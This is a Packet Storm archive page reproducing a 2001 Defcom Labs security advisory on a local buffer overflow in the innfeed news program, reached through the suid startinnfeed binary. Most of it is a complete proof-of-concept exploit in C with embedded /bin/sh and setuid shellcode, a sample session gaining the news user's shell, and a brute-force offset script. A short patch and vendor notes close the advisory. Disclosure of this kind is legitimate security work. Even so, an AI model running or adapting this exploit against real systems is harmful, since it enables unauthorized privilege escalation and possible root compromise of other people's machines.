exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

defcom.innfeed.txt

defcom.innfeed.txt
Posted Apr 19, 2001
Authored by Alex Hernandez, Enrique A. Sanchez Montellano | Site defcom.com

Defcom Labs Advisory def-2001-19 - Innfeed has local stack overflow vulnerabilities in the logOrPrint() function which can be exploited to give uid=news. Tested on Slackware 7.1, Mandrake 7.0, and RedHat 7.2. Includes a patch, proof of concept exploit x-startinnfeed.c, and a shell script to brute force the offset.

tags | overflow, shell, local, vulnerability, proof of concept
systems | linux, redhat, slackware, mandrake
SHA-256 | 4138178fdea0de7a98d769d075ebec0aa842b1ff03426901f91cd2c8b12ac932

defcom.innfeed.txt

Change Mirror Download
======================================================================
Defcom Labs Advisory def-2001-19

innfeed buffer overflow

Author: Enrique A. Sanchez Montellano <@defcom.com>
Author: Alex Hernandez <alex.hernandez@defcom.com>
Release Date: 2001-04-18
======================================================================
------------------------=[Brief Description]=-------------------------
innfeed is a program that implements the NNTP protocol for transerring
news between computers.

Due to no bounds checking on the innfeed program a buffer overflow
occurs while using the -c flag, thus rendering complete control
of the stack. And rendering news uid and gid.

------------------------=[Affected Systems]=--------------------------
Linux:
Slackware 7.1 and older versions.
Mandrake 7.0 and older versions.
RedHat 7.2 and older versions.

----------------------=[Detailed Description]=------------------------
Due to no bounds checking on the logOrPrint() function on the vsprint()
a stack overflow occurs thus rendering the stack. The user then is able
to gain news id, in wich he can the trojan binaries to gain further
access to upgrade his priviledges.

Users trusted to group id can gain further access to news uid thus
gaining owner priviledges on the files and being able to trojan them
in some cases. And if root runs those binaries a root compromise might
be posible.

Offending code:
---------------

vsprintf (buffer,fmt,ap) ;

Example of exploitation:
------------------------

nahual@shell:~$ ls -al /usr/lib/news/bin/innfeed
-r-xr-x--- 1 news news 213124 Jun 14 2000
/usr/lib/news/bin/innfeed*
nahual@shell:~$ ls -al /usr/lib/news/bin/startinnfeed
-r-sr-x--- 1 root news 40796 Jun 14 2000
/usr/lib/news/bin/startinnfeed*
nahual@shell:~$ id
uid=1001(nahual) gid=100(users) groups=100(users),13(news)
nahual@shell:~$ ./x-innfeed
[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]
------------------------------------------------------------
[ + ] Found by:

[ + ] Alex Hernandez (alex.hernandez@defcom.com)
[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)
[ + ] Defcom Labs @ Spain ....
[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)

[ + ] Using address 0xbffff9e4
[ + ] Starting exploitation ...

bash$ id
uid=9(news) gid=13(news) groups=100(users),13(news)
bash$
----

Proof of concept code:
----------------------

--- x-startinnfeed.c ---
/*
x-innfeed.c

Buffer overflow in innfeed being called from startinnfeed renders
uid(news) gid(news), startinnfeed is suid root so I have to also check
if I can manage to get root out of this ....

Enrique A. Sanchez Montellano
(@defcom.com ... Yes is only @defcom.com)
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET 0
#define ALIGN 0
#define BUFFER 470

// MANDRAKE, REDHAT, etc....

#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
//static char shellcode[]=
//"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#endif

#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[]=
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif

unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}

void usage(char *name) {
printf("Usage: %s <offset> <align> <buffer>\n", name);
printf("Defcom Labs @ Spain ...\n");
printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
exit(0);
}

int main(int argc, char **argv) {
char *code;
int offset = OFFSET;
int align = ALIGN;
int buffer = BUFFER;
unsigned long addr;
int i;

if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) align = atoi(argv[2]);
if(argc > 3) buffer = atoi(argv[3]);

code = (char *)malloc(buffer);

printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
printf("------------------------------------------------------------\n");
printf("[ + ] Found by: \n\n[ + ] Alex Hernandez
(alex.hernandez@defcom.com) \n[ + ] Enrique Sanchez (@defcom.com ... Yes
is just @defcom.com)\n");
printf("[ + ] Defcom Labs @ Spain ....\n");
printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

addr = get_sp() - offset;

printf("[ + ] Using address 0x%x\n", addr);

for(i = 0; i <= buffer; i += 4) {
*(long *)&code[i] = 0x90909090;
}

*(long *)&code[buffer - 4] = addr;
*(long *)&code[buffer - 8] = addr;

memcpy(code + buffer - strlen(shellcode) -8 - align, shellcode,
strlen(shellcode));

printf("[ + ] Starting exploitation ... \n\n");

// REDHAT, MANDRAKE ...
#ifdef REDHAT
execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif

// SLACKWARE
#ifdef SLACKWARE
execl("/usr/lib/news/bin/startinnfeed",
"/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif

return 0;
}

--- x-startinnfeed.c ---

--- brute.sh ---
#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 1`
./x-startinnfeed $L
done
--- brute.sh ---

---------------------------=[Workaround]=-----------------------------
Defcom has issued a patch for the vulnerability:

---innfeed-overflow.patch---
210c210
< vsprintf (buffer,fmt,ap) ;
---
> vsnprintf (buffer,512,fmt,ap) ;
---innfeed-overflow.patch---

The recomended action is to upgrade to version 2.3.1 wich is not
vulnerable to this attack due that you have to be news to execute the
script.

root should not run any of this commands as an administrative task
trusted users should do this.

-------------------------=[Vendor Response]=--------------------------
inn-bugs, Katshiro Kondou, and Russ Allbery responded in a fast
and swift way, answering questions.

Thank you to him and all the INN team for their time and responses.
======================================================================
This release was brought to you by Defcom Labs @ Spain

labs@defcom.com www.defcom.com
======================================================================

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close